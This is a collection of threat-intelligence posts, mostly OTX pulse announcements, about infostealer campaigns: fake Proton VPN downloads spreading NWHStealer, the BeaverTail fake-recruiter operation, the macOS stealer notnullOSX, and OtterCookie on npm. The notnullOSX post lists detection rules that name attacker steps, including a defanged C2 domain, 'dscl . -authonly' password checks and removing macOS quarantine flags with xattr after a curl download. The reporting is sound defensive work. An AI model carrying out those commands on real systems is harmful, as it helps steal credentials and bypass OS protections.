Proton VPN: falsa app ruba tutti i dati dal computer
I ricercatori di Malwarebytes hanno individuato un sito web che distribuisce una versione fasulla di Proton VPN. Le ignare vengono ingannate dal design simile a quello originale e scaricano un archivio ZIP che contiene un infostealer. In molti paesi è prevista l’introduzione della verifica dell’età (anche in Europa), quindi i cybercriminali sfrutteranno l’occasione a proprio vantaggio.

#protonvpn #infostealer #proton

https://www.punto-informatico.it/proton-vpn-falsa-app-ruba-dati-computer/

Infostealer-Malware NWHStealer auf gefakten ProtonVPN-Download-Seiten

Mehr:
https://maniabel.work/archiv/1457

#InfoStealer #NWHStealer #YoutubeUni #Maleware #ProtonVPN infosec #up2date

From fake Proton VPN sites to gaming mods, this Windows infostealer is everywhere | Malwarebytes

Pulse ID: 69e24b399265b525ec5bdd33
Pulse Link: https://otx.alienvault.com/pulse/69e24b399265b525ec5bdd33
Pulse Author: CyberHunter_NL
Created: 2026-04-17 15:01:13

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #InfoStealer #MalWareBytes #Malware #OTX #OpenThreatExchange #VPN #Windows #bot #CyberHunter_NL

[Translation] How a “dream job invitation” turns into an attack

It all starts with a notification that feels familiar and exciting for any developer: “You’ve been shortlisted for an AI developer position.” The company looks impressive — DLMind, an “AI innovation lab.” The recruiter appears legitimate — Tim Morenc, CEDS, with a polished LinkedIn profile, professional communication style, and mutual connections.

But behind this friendly outreach is BeaverTail — a malicious operation designed to steal your code, credentials, and developer assets.

The attack is part of a broader pattern associated with North Korean cyber operations, including groups such as Lazarus Group.

How the attack works

The victim is approached via LinkedIn or similar platforms

A convincing fake company and recruiter profile is used

A “technical assignment” or test task is provided

The task contains malicious code or a compromised dependency

Once executed, it extracts sensitive data such as:

GitHub / Git credentials

SSH keys

API tokens

browser session data

Why it works

The campaign relies on social engineering rather than technical exploitation:

trust in recruitment processes

desire for career opportunities

familiarity of developer workflows (GitHub, npm, Python, etc.)

Key takeaway

Any unsolicited “test assignment” should be treated as potentially hostile code. Execution environments must be isolated, and credentials should never be exposed in evaluation setups.

---

#hashtags
#cybersecurity #infosec #malware #socialengineering #phishing #infostealer #supplychainattack #github #developers #techsecurity #beavertail #lazarusgroup

From fake Proton VPN sites to gaming mods, this Windows infostealer is everywhere

Pulse ID: 69e06a7c0d69fc2a60920fdd
Pulse Link: https://otx.alienvault.com/pulse/69e06a7c0d69fc2a60920fdd
Pulse Author: Tr1sa111
Created: 2026-04-16 04:50:04

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #InfoStealer #OTX #OpenThreatExchange #VPN #Windows #bot #Tr1sa111

NotNullOSX macOS stealer TTPs which seem unique from other commodity macOS infostealers:

Block or alert on outbound connections to mactest-6b2ab-default-rtdb[.]firebaseio.com.
Flag persistent text/event-stream (SSE) connections from macOS endpoints.
Alert on Mach-O binaries downloaded from cdn.filestackcontent[.]com.
Monitor for LaunchAgents with plaintext credentials in EnvironmentVariables.
Flag dscl . -authonly calls from non-system processes
Alert on xattr -rd com.apple.quarantine invoked from browser or document context
Review any Full Disk Access grants to unrecognized applications.
Check /tmp for staged, short-lived Mach-O binaries, especially with names matching the module naming convention (*Grab, ReplaceApp).
Alert curl fetching a binary from a not known/familiar domains followed immediately by xattr -d com.apple.quarantine
https://moonlock.com/notorious-hacker-returns-notnullosx-stealer

#threatintel #notnullOSX #infostealer #macos

From fake Proton VPN sites to gaming mods, this Windows infostealer is everywhere

Multiple campaigns are distributing NWHStealer through diverse platforms including fake VPN downloads, hardware utilities, and gaming modifications. The infostealer collects browser data, saved passwords, and cryptocurrency wallet information. Distribution occurs via fake websites impersonating legitimate services like Proton VPN, code hosting platforms such as GitHub and GitLab, file hosting services including MediaFire and SourceForge, and links from YouTube videos. Two primary infection methods are analyzed: one using a free web hosting provider distributing malicious ZIP files with self-injection loaders, and another employing fake websites with DLL hijacking techniques that inject into the RegAsm process. The stealer targets over 25 cryptocurrency wallets and multiple browsers, exfiltrating data to command-and-control servers using AES-CBC encryption and maintaining persistence through scheduled tasks and UAC bypass techniques.

Pulse ID: 69dfb91808e1258915184d6e
Pulse Link: https://otx.alienvault.com/pulse/69dfb91808e1258915184d6e
Pulse Author: AlienVault
Created: 2026-04-15 16:13:12

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CyberSecurity #ELF #Encryption #GitHub #InfoSec #InfoStealer #OTX #OpenThreatExchange #Password #Passwords #RAT #RCE #VPN #Windows #Word #YouTube #ZIP #bot #cryptocurrency #AlienVault

A new Mac stealer targeting $10K+ crypto wallets

A sophisticated macOS stealer called notnullOSX emerged in March 2026, developed by threat actor alh1mik (formerly 0xFFF) who returned after a 2023 exit from underground forums. This Go-written modular stealer exclusively targets macOS users with cryptocurrency holdings exceeding $10,000. Distribution occurs through ClickFix social engineering and malicious DMG files disguised as legitimate applications like WallSpace. The malware employs a modular architecture with specialized components to exfiltrate iMessage history, Apple Notes, browser credentials, Safari cookies, crypto wallet files, SSH keys, and cloud provider credentials. By social-engineering victims into granting Full Disk Access, notnullOSX bypasses macOS TCC protections without triggering permission dialogs. The stealer maintains persistent WebSocket connections to Firebase infrastructure, functioning as both an infostealer and backdoor with remote module update capabilities.

Pulse ID: 69dfa7d6ed3496f811a87d22
Pulse Link: https://otx.alienvault.com/pulse/69dfa7d6ed3496f811a87d22
Pulse Author: AlienVault
Created: 2026-04-15 14:59:34

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #Browser #Cloud #Cookies #CyberSecurity #InfoSec #InfoStealer #Mac #MacOS #Malware #OTX #OpenThreatExchange #RAT #SSH #Safari #SocialEngineering #bot #cryptocurrency #AlienVault

Tracking an OtterCookie Infostealer Campaign Across npm

Pulse ID: 69ddc21e3b9bc0b44e740eba
Pulse Link: https://otx.alienvault.com/pulse/69ddc21e3b9bc0b44e740eba
Pulse Author: Tr1sa111
Created: 2026-04-14 04:27:10

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #InfoStealer #NPM #OTX #OpenThreatExchange #bot #Tr1sa111